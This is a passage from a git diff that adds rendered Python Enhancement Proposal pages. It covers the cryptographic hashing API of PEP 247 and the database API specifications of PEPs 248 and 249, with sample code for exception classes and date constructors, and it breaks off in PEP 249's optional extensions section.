Table of Contents +
+
+

Abstract

+

There are several different modules available that implement cryptographic +hashing algorithms such as MD5 or SHA. This document specifies a standard API +for such algorithms, to make it easier to switch between different +implementations.

+
+
+

Specification

+

All hashing modules should present the same interface. Additional methods or +variables can be added, but those described in this document should always be +present.

+

Hash function modules define one function:

+
+
new([string])            (unkeyed hashes)
+
new([key] , [string])    (keyed hashes)
+
+
+
Create a new hashing object and return it. The first form is for hashes +that are unkeyed, such as MD5 or SHA. For keyed hashes such as HMAC, key +is a required parameter containing a string giving the key to use. In both +cases, the optional string parameter, if supplied, will be immediately +hashed into the object’s starting state, as if obj.update(string) +was called.

After creating a hashing object, arbitrary strings can be fed into the +object using its update() method, and the hash value can be obtained at +any time by calling the object’s digest() method.

+

Arbitrary additional keyword arguments can be added to this function, but if +they’re not supplied, sensible default values should be used. For example, +rounds and digest_size keywords could be added for a hash function +which supports a variable number of rounds and several different output +sizes, and they should default to values believed to be secure.

+
+

Hash function modules define one variable:

+
+
digest_size
+
+
+
An integer value; the size of the digest produced by the hashing objects +created by this module, measured in bytes. You could also obtain this value +by creating a sample object and accessing its digest_size attribute, but +it can be convenient to have this value available from the module. Hashes +with a variable output size will set this variable to None.
+

Hashing objects require a single attribute:

+
+
digest_size
+
+
+
This attribute is identical to the module-level digest_size variable, +measuring the size of the digest produced by the hashing object, measured in +bytes. If the hash has a variable output size, this output size must be +chosen when the hashing object is created, and this attribute must contain +the selected size. Therefore, None is not a legal value for this +attribute.
+

Hashing objects require the following methods:

+
+
copy()
+
+
+
Return a separate copy of this hashing object. An update to this copy won’t +affect the original object.
+
+
digest()
+
+
+
Return the hash value of this hashing object as a string containing 8-bit +data. The object is not altered in any way by this function; you can +continue updating the object after calling this function.
+
+
hexdigest()
+
+
+
Return the hash value of this hashing object as a string containing +hexadecimal digits. Lowercase letters should be used for the digits a +through f. Like the .digest() method, this method mustn’t alter the +object.
+
+
update(string)
+
+
+
Hash string into the current state of the hashing object. update() can +be called any number of times during a hashing object’s lifetime.
+

Hashing modules can define additional module-level functions or object methods +and still be compliant with this specification.

+

Here’s an example, using a module named MD5:

+
>>> from Crypto.Hash import MD5
+>>> m = MD5.new()
+>>> m.digest_size
+16
+>>> m.update('abc')
+>>> m.digest()
+'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+>>> m.hexdigest()
+'900150983cd24fb0d6963f7d28e17f72'
+>>> MD5.new('abc').digest()
+'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+
+
+
+
+

Rationale

+

The digest size is measured in bytes, not bits, even though hash algorithm +sizes are usually quoted in bits; MD5 is a 128-bit algorithm and not a 16-byte +one, for example. This is because, in the sample code I looked at, the length +in bytes is often needed (to seek ahead or behind in a file; to compute the +length of an output string) while the length in bits is rarely used. Therefore, +the burden will fall on the few people actually needing the size in bits, who +will have to multiply digest_size by 8.

+

It’s been suggested that the update() method would be better named +append(). However, that method is really causing the current state of the +hashing object to be updated, and update() is already used by the md5 and +sha modules included with Python, so it seems simplest to leave the name +update() alone.

+

The order of the constructor’s arguments for keyed hashes was a sticky issue. +It wasn’t clear whether the key should come first or second. It’s a required +parameter, and the usual convention is to place required parameters first, but +that also means that the string parameter moves from the first position to +the second. It would be possible to get confused and pass a single argument to +a keyed hash, thinking that you’re passing an initial string to an unkeyed +hash, but it doesn’t seem worth making the interface for keyed hashes more +obscure to avoid this potential error.

+
+
+

Changes

+

2001-09-17: Renamed clear() to reset(); added digest_size attribute +to objects; added .hexdigest() method.

+

2001-09-20: Removed reset() method completely.

+

2001-09-28: Set digest_size to None for variable-size hashes.

+
+
+

Acknowledgements

+

Thanks to Aahz, Andrew Archibald, Rich Salz, Itamar Shtull-Trauring, and the +readers of the python-crypto list for their comments on this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0247.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0248/index.html b/pep-0248/index.html new file mode 100644 index 00000000000..2939e3cd68c --- /dev/null +++ b/pep-0248/index.html @@ -0,0 +1,361 @@ + + + + + + + + PEP 248 – Python Database API Specification v1.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 248 – Python Database API Specification v1.0

+
+
Author:
+
Greg Stein <gstein at lyra.org>, Marc-André Lemburg <mal at lemburg.com>
+
Discussions-To:
+
Db-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
08-May-1996
+
Post-History:
+

+
Superseded-By:
+
249
+
+
+
+
Table of Contents +
+
+

Introduction

+

This API has been defined to encourage similarity between the +Python modules that are used to access databases. By doing this, +we hope to achieve a consistency leading to more easily understood +modules, code that is generally more portable across databases, +and a broader reach of database connectivity from Python.

+

This interface specification consists of several items:

+
    +
  • Module Interface
  • +
  • Connection Objects
  • +
  • Cursor Objects
  • +
  • DBI Helper Objects
  • +
+

Comments and questions about this specification may be directed to +the SIG on Tabular Databases in Python +(http://www.python.org/sigs/db-sig).

+

This specification document was last updated on: April 9, 1996. +It will be known as Version 1.0 of this specification.

+
+
+

Module Interface

+

The database interface modules should typically be named with +something terminated by db. Existing examples are: oracledb, +informixdb, and pg95db. These modules should export several +names:

+
+
modulename(connection_string)
Constructor for creating a connection to the database. +Returns a Connection Object.
+
error
Exception raised for errors from the database module.
+
+
+
+

Connection Objects

+

Connection Objects should respond to the following methods:

+
+
close()
Close the connection now (rather than whenever __del__ is +called). The connection will be unusable from this point +forward; an exception will be raised if any operation is +attempted with the connection.
+
commit()
Commit any pending transaction to the database.
+
rollback()
Roll the database back to the start of any pending +transaction.
+
cursor()
Return a new Cursor Object. An exception may be thrown if +the database does not support a cursor concept.
+
callproc([params])
(Note: this method is not well-defined yet.) Call a +stored database procedure with the given (optional) +parameters. Returns the result of the stored procedure.
+
(all Cursor Object attributes and methods)
For databases that do not have cursors and for simple +applications that do not require the complexity of a +cursor, a Connection Object should respond to each of the +attributes and methods of the Cursor Object. Databases +that have cursor can implement this by using an implicit, +internal cursor.
+
+
+
+

Cursor Objects

+

These objects represent a database cursor, which is used to manage +the context of a fetch operation.

+

Cursor Objects should respond to the following methods and +attributes:

+
+
arraysize
This read/write attribute specifies the number of rows to +fetch at a time with fetchmany(). This value is also used +when inserting multiple rows at a time (passing a +tuple/list of tuples/lists as the params value to +execute()). This attribute will default to a single row.

Note that the arraysize is optional and is merely provided +for higher performance database interactions. +Implementations should observe it with respect to the +fetchmany() method, but are free to interact with the +database a single row at a time.

+
+
description
This read-only attribute is a tuple of 7-tuples. Each +7-tuple contains information describing each result +column: (name, type_code, display_size, internal_size, +precision, scale, null_ok). This attribute will be None +for operations that do not return rows or if the cursor +has not had an operation invoked via the execute() method +yet.

The ‘type_code’ is one of the ‘dbi’ values specified in +the section below.

+

Note: this is a bit in flux. Generally, the first two +items of the 7-tuple will always be present; the others +may be database specific.

+
+
close()
Close the cursor now (rather than whenever __del__ is +called). The cursor will be unusable from this point +forward; an exception will be raised if any operation is +attempted with the cursor.
+
execute(operation [,params])
Execute (prepare) a database operation (query or command). +Parameters may be provided (as a sequence +(e.g. tuple/list)) and will be bound to variables in the +operation. Variables are specified in a database-specific +notation that is based on the index in the parameter tuple +(position-based rather than name-based).

The parameters may also be specified as a sequence of +sequences (e.g. a list of tuples) to insert multiple rows +in a single operation.

+

A reference to the operation will be retained by the +cursor. If the same operation object is passed in again, +then the cursor can optimize its behavior. This is most +effective for algorithms where the same operation is used, +but different parameters are bound to it (many times).

+

For maximum efficiency when reusing an operation, it is +best to use the setinputsizes() method to specify the +parameter types and sizes ahead of time. It is legal for +a parameter to not match the predefined information; the +implementation should compensate, possibly with a loss of +efficiency.

+

Using SQL terminology, these are the possible result +values from the execute() method:

+
    +
  • If the statement is DDL (e.g. CREATE TABLE), then 1 is +returned.
  • +
  • If the statement is DML (e.g. UPDATE or INSERT), then the +number of rows affected is returned (0 or a positive +integer).
  • +
  • If the statement is DQL (e.g. SELECT), None is returned, +indicating that the statement is not really complete until +you use one of the ‘fetch’ methods.
  • +
+
+
fetchone()
Fetch the next row of a query result, returning a single +tuple.
+
fetchmany([size])
Fetch the next set of rows of a query result, returning as +a list of tuples. An empty list is returned when no more +rows are available. The number of rows to fetch is +specified by the parameter. If it is None, then the +cursor’s arraysize determines the number of rows to be +fetched.

Note there are performance considerations involved with +the size parameter. For optimal performance, it is +usually best to use the arraysize attribute. If the size +parameter is used, then it is best for it to retain the +same value from one fetchmany() call to the next.

+
+
fetchall()
Fetch all rows of a query result, returning as a list of +tuples. Note that the cursor’s arraysize attribute can +affect the performance of this operation.
+
setinputsizes(sizes)
(Note: this method is not well-defined yet.) This can be +used before a call to execute() to predefine memory +areas for the operation’s parameters. sizes is specified +as a tuple – one item for each input parameter. The item +should be a Type object that corresponds to the input that +will be used, or it should be an integer specifying the +maximum length of a string parameter. If the item is +None, then no predefined memory area will be reserved +for that column (this is useful to avoid predefined areas +for large inputs).

This method would be used before the execute() method is +invoked.

+

Note that this method is optional and is merely provided +for higher performance database interaction. +Implementations are free to do nothing and users are free +to not use it.

+
+
setoutputsize(size [,col])
(Note: this method is not well-defined yet.)

Set a column buffer size for fetches of large columns +(e.g. LONG). The column is specified as an index into the +result tuple. Using a column of None will set the default +size for all large columns in the cursor.

+

This method would be used before the execute() method is +invoked.

+

Note that this method is optional and is merely provided +for higher performance database interaction. +Implementations are free to do nothing and users are free +to not use it.

+
+
+
+
+

DBI Helper Objects

+

Many databases need to have the input in a particular format for +binding to an operation’s input parameters. For example, if an +input is destined for a DATE column, then it must be bound to the +database in a particular string format. Similar problems exist +for “Row ID” columns or large binary items (e.g. blobs or RAW +columns). This presents problems for Python since the parameters +to the execute() method are untyped. When the database module +sees a Python string object, it doesn’t know if it should be bound +as a simple CHAR column, as a raw binary item, or as a DATE.

+

To overcome this problem, the ‘dbi’ module was created. This +module specifies some basic database interface types for working +with databases. There are two classes: ‘dbiDate’ and ‘dbiRaw’. +These are simple container classes that wrap up a value. When +passed to the database modules, the module can then detect that +the input parameter is intended as a DATE or a RAW. For symmetry, +the database modules will return DATE and RAW columns as instances +of these classes.

+

A Cursor Object’s ‘description’ attribute returns information +about each of the result columns of a query. The ‘type_code’ is +defined to be one of five types exported by this module: STRING, +RAW, NUMBER, DATE, or ROWID.

+

The module exports the following names:

+
+
dbiDate(value)
This function constructs a ‘dbiDate’ instance that holds a +date value. The value should be specified as an integer +number of seconds since the “epoch” (e.g. time.time()).
+
dbiRaw(value)
This function constructs a ‘dbiRaw’ instance that holds a +raw (binary) value. The value should be specified as a +Python string.
+
STRING
This object is used to describe columns in a database that +are string-based (e.g. CHAR).
+
RAW
This object is used to describe (large) binary columns in +a database (e.g. LONG RAW, blobs).
+
NUMBER
This object is used to describe numeric columns in a +database.
+
DATE
This object is used to describe date columns in a +database.
+
ROWID
This object is used to describe the “Row ID” column in a +database.
+
+
+
+

Acknowledgements

+

Many thanks go to Andrew Kuchling who converted the Python +Database API Specification 1.0 from the original HTML format into +the PEP format in 2001.

+

Greg Stein is the original author of the Python Database API +Specification 1.0. Marc-André later continued maintenance of the API as +an editor.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0248.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0249/index.html b/pep-0249/index.html new file mode 100644 index 00000000000..da948870806 --- /dev/null +++ b/pep-0249/index.html @@ -0,0 +1,1232 @@ + + + + + + + + PEP 249 – Python Database API Specification v2.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 249 – Python Database API Specification v2.0

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Discussions-To:
+
Db-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Apr-1999
+
Post-History:
+

+
Replaces:
+
248
+
+
+
+
Table of Contents +
+
+

Introduction

+

This API has been defined to encourage similarity between the Python +modules that are used to access databases. By doing this, we hope to +achieve a consistency leading to more easily understood modules, code +that is generally more portable across databases, and a broader reach +of database connectivity from Python.

+

Comments and questions about this specification may be directed to the +SIG for Database Interfacing with Python.

+

For more information on database interfacing with Python and available +packages see the Database Topic Guide.

+

This document describes the Python Database API Specification 2.0 and +a set of common optional extensions. The previous version 1.0 version +is still available as reference, in PEP 248. Package writers are +encouraged to use this version of the specification as basis for new +interfaces.

+
+
+

Module Interface

+
+

Constructors

+

Access to the database is made available through connection +objects. The module must provide the following constructor for these:

+
+
connect( parameters… )
Constructor for creating a connection to the database.

Returns a Connection Object. It takes a number of parameters +which are database dependent. [1]

+
+
+
+
+

Globals

+

These module globals must be defined:

+
+
apilevel
String constant stating the supported DB API level.

Currently only the strings “1.0” and “2.0” are allowed. +If not given, a DB-API 1.0 level interface should be assumed.

+
+
+
+
threadsafety
Integer constant stating the level of thread safety the interface +supports. Possible values are: + + + + + + + + + + + + + + + + + + + +
threadsafetyMeaning
0Threads may not share the module.
1Threads may share the module, but not connections.
2Threads may share the module and connections.
3Threads may share the module, connections and cursors.
+

Sharing in the above context means that two threads may use a +resource without wrapping it using a mutex semaphore to implement +resource locking. Note that you cannot always make external +resources thread safe by managing access using a mutex: the +resource may rely on global variables or other external sources +that are beyond your control.

+
+
+
+
paramstyle
String constant stating the type of parameter marker formatting +expected by the interface. Possible values are [2]: + + + + + + + + + + + + + + + + + + + + + + +
paramstyleMeaning
qmarkQuestion mark style, e.g. ...WHERE name=?
numericNumeric, positional style, e.g. ...WHERE name=:1
namedNamed style, e.g. ...WHERE name=:name
formatANSI C printf format codes, e.g. ...WHERE name=%s
pyformatPython extended format codes, e.g. ...WHERE name=%(name)s
+
+
+
+
+

Exceptions

+

The module should make all error information available through these +exceptions or subclasses thereof:

+
+
Warning
Exception raised for important warnings like data truncations +while inserting, etc. It must be a subclass of the Python +Exception class [10] [11].
+
+
+
Error
Exception that is the base class of all other error +exceptions. You can use this to catch all errors with one single +except statement. Warnings are not considered errors and thus +should not use this class as base. It must be a subclass of the +Python Exception class [10].
+
+
+
InterfaceError
Exception raised for errors that are related to the database +interface rather than the database itself. It must be a subclass +of Error.
+
+
+
DatabaseError
Exception raised for errors that are related to the database. It +must be a subclass of Error.
+
+
+
DataError
Exception raised for errors that are due to problems with the +processed data like division by zero, numeric value out of range, +etc. It must be a subclass of DatabaseError.
+
+
+
OperationalError
Exception raised for errors that are related to the database’s +operation and not necessarily under the control of the programmer, +e.g. an unexpected disconnect occurs, the data source name is not +found, a transaction could not be processed, a memory allocation +error occurred during processing, etc. It must be a subclass of +DatabaseError.
+
+
+
IntegrityError
Exception raised when the relational integrity of the database is +affected, e.g. a foreign key check fails. It must be a subclass +of DatabaseError.
+
+
+
InternalError
Exception raised when the database encounters an internal error, +e.g. the cursor is not valid anymore, the transaction is out of +sync, etc. It must be a subclass of DatabaseError.
+
+
+
ProgrammingError
Exception raised for programming errors, e.g. table not found or +already exists, syntax error in the SQL statement, wrong number of +parameters specified, etc. It must be a subclass of +DatabaseError.
+
+
+
NotSupportedError
Exception raised in case a method or database API was used which +is not supported by the database, e.g. requesting a +.rollback() on a connection that does not support transaction +or has transactions turned off. It must be a subclass of +DatabaseError.
+
+

This is the exception inheritance layout [10] [11]:

+
Exception
+|__Warning
+|__Error
+   |__InterfaceError
+   |__DatabaseError
+      |__DataError
+      |__OperationalError
+      |__IntegrityError
+      |__InternalError
+      |__ProgrammingError
+      |__NotSupportedError
+
+
+
+

Note

+

The values of these exceptions are not defined. They should give the user +a fairly good idea of what went wrong, though.

+
+
+
+
+

Connection Objects

+

Connection objects should respond to the following methods.

+
+

Connection methods

+
+
.close()
Close the connection now (rather than whenever .__del__() is +called).

The connection will be unusable from this point forward; an Error +(or subclass) exception will be raised if any operation is +attempted with the connection. The same applies to all cursor +objects trying to use the connection. Note that closing a +connection without committing the changes first will cause an +implicit rollback to be performed.

+
+
+
+
.commit()
Commit any pending transaction to the database.

Note that if the database supports an auto-commit feature, this must be +initially off. An interface method may be provided to turn it back on.

+

Database modules that do not support transactions should implement this +method with void functionality.

+
+
+
+
.rollback()
This method is optional since not all databases provide transaction +support. [3]

In case a database does provide transactions this method causes the +database to roll back to the start of any pending transaction. Closing a +connection without committing the changes first will cause an implicit +rollback to be performed.

+
+
+
+
.cursor()
Return a new Cursor Object using the connection.

If the database does not provide a direct cursor concept, the module will +have to emulate cursors using other means to the extent needed by this +specification. [4]

+
+
+
+
+
+

Cursor Objects

+

These objects represent a database cursor, which is used to manage the +context of a fetch operation. Cursors created from the same connection +are not isolated, i.e., any changes done to the database by a cursor +are immediately visible by the other cursors. Cursors created from +different connections can or can not be isolated, depending on how the +transaction support is implemented (see also the connection’s +.rollback() and .commit() methods).

+

Cursor Objects should respond to the following methods and attributes.

+
+

Cursor attributes

+
+
.description
This read-only attribute is a sequence of 7-item sequences.

Each of these sequences contains information describing one result +column:

+
    +
  • name
  • +
  • type_code
  • +
  • display_size
  • +
  • internal_size
  • +
  • precision
  • +
  • scale
  • +
  • null_ok
  • +
+

The first two items (name and type_code) are mandatory, +the other five are optional and are set to None if no +meaningful values can be provided.

+

This attribute will be None for operations that do not return +rows or if the cursor has not had an operation invoked via the +.execute*() method yet.

+

The type_code can be interpreted by comparing it to the Type +Objects specified in the section below.

+
+
+
+
.rowcount
This read-only attribute specifies the number of rows that the last +.execute*() produced (for DQL statements like SELECT) or affected +(for DML statements like UPDATE or INSERT). [9]

The attribute is -1 in case no .execute*() has been performed +on the cursor or the rowcount of the last operation is cannot be +determined by the interface. [7]

+
+

Note

+

Future versions of the DB API specification could redefine the +latter case to have the object return None instead of -1.

+
+
+
+
+
+

Cursor methods

+
+
.callproc( procname [, parameters ] )
(This method is optional since not all databases provide stored +procedures. [3])

Call a stored database procedure with the given name. The sequence +of parameters must contain one entry for each argument that the +procedure expects. The result of the call is returned as modified +copy of the input sequence. Input parameters are left untouched, +output and input/output parameters replaced with possibly new +values.

+

The procedure may also provide a result set as output. This must +then be made available through the standard .fetch*() methods.

+
+
+
+
.close()
Close the cursor now (rather than whenever __del__ is called).

The cursor will be unusable from this point forward; an Error (or +subclass) exception will be raised if any operation is attempted +with the cursor.

+
+
+
+
.execute(operation [, parameters])
Prepare and execute a database operation (query or command).

Parameters may be provided as sequence or mapping and will be +bound to variables in the operation. Variables are specified in a +database-specific notation (see the module’s paramstyle attribute +for details). [5]

+

A reference to the operation will be retained by the cursor. If +the same operation object is passed in again, then the cursor can +optimize its behavior. This is most effective for algorithms +where the same operation is used, but different parameters are +bound to it (many times).

+

For maximum efficiency when reusing an operation, it is best to +use the .setinputsizes() method to specify the parameter types +and sizes ahead of time. It is legal for a parameter to not match +the predefined information; the implementation should compensate, +possibly with a loss of efficiency.

+

The parameters may also be specified as list of tuples to +e.g. insert multiple rows in a single operation, but this kind of +usage is deprecated: .executemany() should be used instead.

+

Return values are not defined.

+
+
+
+
.executemany( operation, seq_of_parameters )
Prepare a database operation (query or command) and then execute it +against all parameter sequences or mappings found in the sequence +seq_of_parameters.

Modules are free to implement this method using multiple calls to +the .execute() method or by using array operations to have the +database process the sequence as a whole in one call.

+

Use of this method for an operation which produces one or more +result sets constitutes undefined behavior, and the implementation +is permitted (but not required) to raise an exception when it +detects that a result set has been created by an invocation of the +operation.

+

The same comments as for .execute() also apply accordingly to +this method.

+

Return values are not defined.

+
+
+
+
.fetchone()
Fetch the next row of a query result set, returning a single +sequence, or None when no more data is available. [6]

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.fetchmany([size=cursor.arraysize])
Fetch the next set of rows of a query result, returning a sequence +of sequences (e.g. a list of tuples). An empty sequence is +returned when no more rows are available.

The number of rows to fetch per call is specified by the +parameter. If it is not given, the cursor’s arraysize determines +the number of rows to be fetched. The method should try to fetch +as many rows as indicated by the size parameter. If this is not +possible due to the specified number of rows not being available, +fewer rows may be returned.

+

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+

Note there are performance considerations involved with the size +parameter. For optimal performance, it is usually best to use the +.arraysize attribute. If the size parameter is used, then it +is best for it to retain the same value from one .fetchmany() +call to the next.

+
+
+
+
.fetchall()
Fetch all (remaining) rows of a query result, returning them as a +sequence of sequences (e.g. a list of tuples). Note that the +cursor’s arraysize attribute can affect the performance of this +operation.

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.nextset()
(This method is optional since not all databases support multiple +result sets. [3])

This method will make the cursor skip to the next available set, +discarding any remaining rows from the current set.

+

If there are no more sets, the method returns None. Otherwise, +it returns a true value and subsequent calls to the .fetch*() +methods will return rows from the next result set.

+

An Error (or subclass) exception is raised if the previous call +to .execute*() did not produce any result set or no call was +issued yet.

+
+
+
+
.arraysize
This read/write attribute specifies the number of rows to fetch at +a time with .fetchmany(). It defaults to 1 meaning to fetch a +single row at a time.

Implementations must observe this value with respect to the +.fetchmany() method, but are free to interact with the database +a single row at a time. It may also be used in the implementation +of .executemany().

+
+
+
+
.setinputsizes(sizes)
This can be used before a call to .execute*() to predefine +memory areas for the operation’s parameters.

sizes is specified as a sequence — one item for each input +parameter. The item should be a Type Object that corresponds to +the input that will be used, or it should be an integer specifying +the maximum length of a string parameter. If the item is +None, then no predefined memory area will be reserved for that +column (this is useful to avoid predefined areas for large +inputs).

+

This method would be used before the .execute*() method is +invoked.

+

Implementations are free to have this method do nothing and users +are free to not use it.

+
+
+
+
.setoutputsize(size [, column])
Set a column buffer size for fetches of large columns +(e.g. LONGs, BLOBs, etc.). The column is specified as +an index into the result sequence. Not specifying the column will +set the default size for all large columns in the cursor.

This method would be used before the .execute*() method is +invoked.

+

Implementations are free to have this method do nothing and users +are free to not use it.

+
+
+
+
+
+

Type Objects and Constructors

+

Many databases need to have the input in a particular format for +binding to an operation’s input parameters. For example, if an input +is destined for a DATE column, then it must be bound to the +database in a particular string format. Similar problems exist for +“Row ID” columns or large binary items (e.g. blobs or RAW +columns). This presents problems for Python since the parameters to +the .execute*() method are untyped. When the database module sees +a Python string object, it doesn’t know if it should be bound as a +simple CHAR column, as a raw BINARY item, or as a DATE.

+

To overcome this problem, a module must provide the constructors +defined below to create objects that can hold special values. When +passed to the cursor methods, the module can then detect the proper +type of the input parameter and bind it accordingly.

+

A Cursor Object’s description attribute returns information about +each of the result columns of a query. The type_code must compare +equal to one of Type Objects defined below. Type Objects may be equal +to more than one type code (e.g. DATETIME could be equal to the +type codes for date, time and timestamp columns; see the +Implementation Hints below for details).

+

The module exports the following constructors and singletons:

+
+
Date(year, month, day)
This function constructs an object holding a date value.
+
+
+
Time(hour, minute, second)
This function constructs an object holding a time value.
+
+
+
Timestamp(year, month, day, hour, minute, second)
This function constructs an object holding a time stamp value.
+
+
+
DateFromTicks(ticks)
This function constructs an object holding a date value from the +given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
TimeFromTicks(ticks)
This function constructs an object holding a time value from the +given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
TimestampFromTicks(ticks)
This function constructs an object holding a time stamp value from +the given ticks value (number of seconds since the epoch; see the +documentation of the standard Python time module for details).
+
+
+
Binary(string)
This function constructs an object capable of holding a binary +(long) string value.
+
+
+
STRING type
This type object is used to describe columns in a database that +are string-based (e.g. CHAR).
+
+
+
BINARY type
This type object is used to describe (long) binary columns in a +database (e.g. LONG, RAW, BLOBs).
+
+
+
NUMBER type
This type object is used to describe numeric columns in a +database.
+
+
+
DATETIME type
This type object is used to describe date/time columns in a +database.
+
+
+
ROWID type
This type object is used to describe the “Row ID” column in a +database.
+
+

SQL NULL values are represented by the Python None singleton +on input and output.

+
+

Note

+

Usage of Unix ticks for database interfacing can cause troubles +because of the limited date range they cover.

+
+
+
+

Implementation Hints for Module Authors

+
    +
  • Date/time objects can be implemented as Python datetime module objects (available +since Python 2.3, with a C API since 2.4) or using the mxDateTime package +(available for all Python versions since 1.5.2). They both provide +all necessary constructors and methods at Python and C level.
  • +
  • Here is a sample implementation of the Unix ticks based constructors +for date/time delegating work to the generic constructors:
    import time
    +
    +def DateFromTicks(ticks):
    +    return Date(*time.localtime(ticks)[:3])
    +
    +def TimeFromTicks(ticks):
    +    return Time(*time.localtime(ticks)[3:6])
    +
    +def TimestampFromTicks(ticks):
    +    return Timestamp(*time.localtime(ticks)[:6])
    +
    +
    +
  • +
  • The preferred object type for Binary objects are the buffer types +available in standard Python starting with version 1.5.2. Please +see the Python documentation for details. For information about the +C interface have a look at Include/bufferobject.h and +Objects/bufferobject.c in the Python source distribution.
  • +
  • This Python class allows implementing the above type objects even +though the description type code field yields multiple values for on +type object:
    class DBAPITypeObject:
    +    def __init__(self,*values):
    +        self.values = values
    +    def __cmp__(self,other):
    +        if other in self.values:
    +            return 0
    +        if other < self.values:
    +            return 1
    +        else:
    +            return -1
    +
    +
    +

    The resulting type object compares equal to all values passed to the +constructor.

    +
  • +
  • Here is a snippet of Python code that implements the exception +hierarchy defined above [10]:
    class Error(Exception):
    +    pass
    +
    +class Warning(Exception):
    +    pass
    +
    +class InterfaceError(Error):
    +    pass
    +
    +class DatabaseError(Error):
    +    pass
    +
    +class InternalError(DatabaseError):
    +    pass
    +
    +class OperationalError(DatabaseError):
    +    pass
    +
    +class ProgrammingError(DatabaseError):
    +    pass
    +
    +class IntegrityError(DatabaseError):
    +    pass
    +
    +class DataError(DatabaseError):
    +    pass
    +
    +class NotSupportedError(DatabaseError):
    +    pass
    +
    +
    +

    In C you can use the PyErr_NewException(fullname, base, NULL) +API to create the exception objects.

    +
  • +
+
+
+

Optional DB API Extensions

+

During the lifetime of DB API 2.0, module authors have often extended +their implementations beyond what is required by this DB API +specification. To enhance compatibility and to provide a clean upgrade +path to possible future versions of the specification, this section +defines a set of common extensions to the core DB API 2.0 +specification.

+

As with all DB API optional features, the database module authors are +free to not implement these additional attributes and methods (using +them will then result in an AttributeError) or to raise a +NotSupportedError in case the availability can only be checked at +run-time.

+

It has been proposed to make usage of these extensions optionally +visible to the programmer by issuing Python warnings through the +Python warning framework. To make this feature useful, the warning +messages must be standardized in order to be able to mask them. These +standard messages are referred to below as Warning Message.

+
+
Cursor.rownumber
This read-only attribute should provide the current 0-based index +of the cursor in the result set or None if the index cannot be +determined.

The index can be seen as index of the cursor in a sequence (the +result set). The next fetch operation will fetch the row indexed +by .rownumber in that sequence.

+

Warning Message: “DB-API extension cursor.rownumber used”

+
+
+
+
Connection.Error, Connection.ProgrammingError, etc.
All exception classes defined by the DB API standard should be +exposed on the Connection objects as attributes (in addition to +being available at module scope).

These attributes simplify error handling in multi-connection +environments.

+

Warning Message: “DB-API extension connection.<exception> used”

+
+
+
+
Cursor.connection
This read-only attribute return a reference to the Connection +object on which the cursor was created.

The attribute simplifies writing polymorph code in +multi-connection environments.

+

Warning Message: “DB-API extension cursor.connection used”

+
+
+
+
Cursor.scroll(value [, mode=’relative’ ])
Scroll the cursor in the result set to a new position according to +mode.

If mode is relative (default), value is taken as offset to the +current position in the result set, if set to absolute, value +states an absolute target position.

+

An IndexError should be raised in case a scroll operation +would leave the result set. In this case, the cursor position is +left undefined (ideal would be to not move the cursor at all).

+
+

Note

+

This method should use native scrollable cursors, if available, +or revert to an emulation for forward-only scrollable +cursors. The method may raise NotSupportedError to signal +that a specific operation is not supported by the database +(e.g. backward scrolling).

+
+

Warning Message: “DB-API extension cursor.scroll() used”

+
+
+
+
Cursor.messages
This is a Python list object to which the interface appends tuples +(exception class, exception value) for all messages which the +interfaces receives from the underlying database for this cursor.

The list is cleared by all standard cursor methods calls (prior to +executing the call) except for the .fetch*() calls +automatically to avoid excessive memory usage and can also be +cleared by executing del cursor.messages[:].

+

All error and warning messages generated by the database are +placed into this list, so checking the list allows the user to +verify correct operation of the method calls.

+

The aim of this attribute is to eliminate the need for a Warning +exception which often causes problems (some warnings really only +have informational character).

+

Warning Message: “DB-API extension cursor.messages used”

+
+
+
+
Connection.messages
Same as Cursor.messages except that the messages in the list are +connection oriented.

The list is cleared automatically by all standard connection +methods calls (prior to executing the call) to avoid excessive +memory usage and can also be cleared by executing del +connection.messages[:].

+

Warning Message: “DB-API extension connection.messages used”

+
+
+
+
Cursor.next()
Return the next row from the currently executing SQL statement +using the same semantics as .fetchone(). A StopIteration +exception is raised when the result set is exhausted for Python +versions 2.2 and later. Previous versions don’t have the +StopIteration exception and so the method should raise an +IndexError instead.

Warning Message: “DB-API extension cursor.next() used”

+
+
+
+
Cursor.__iter__()
Return self to make cursors compatible to the iteration protocol +[8].

Warning Message: “DB-API extension cursor.__iter__() used”

+
+
+
+
Cursor.lastrowid
This read-only attribute provides the rowid of the last modified +row (most databases return a rowid only when a single INSERT +operation is performed). If the operation does not set a rowid or +if the database does not support rowids, this attribute should be +set to None.

The semantics of .lastrowid are undefined in case the last +executed statement modified more than one row, e.g. when using +INSERT with .executemany().

+

Warning Message: “DB-API extension cursor.lastrowid used”

+
+
+
+
Connection.autocommit
Attribute to query and set the autocommit mode of the connection.

Return True if the connection is operating in autocommit +(non-transactional) mode. Return False if the connection is +operating in manual commit (transactional) mode.

+

Setting the attribute to True or False adjusts the +connection’s mode accordingly.

+

Changing the setting from True to False (disabling +autocommit) will have the database leave autocommit mode and start +a new transaction. Changing from False to True (enabling +autocommit) has database dependent semantics with respect to how +pending transactions are handled. [12]

+

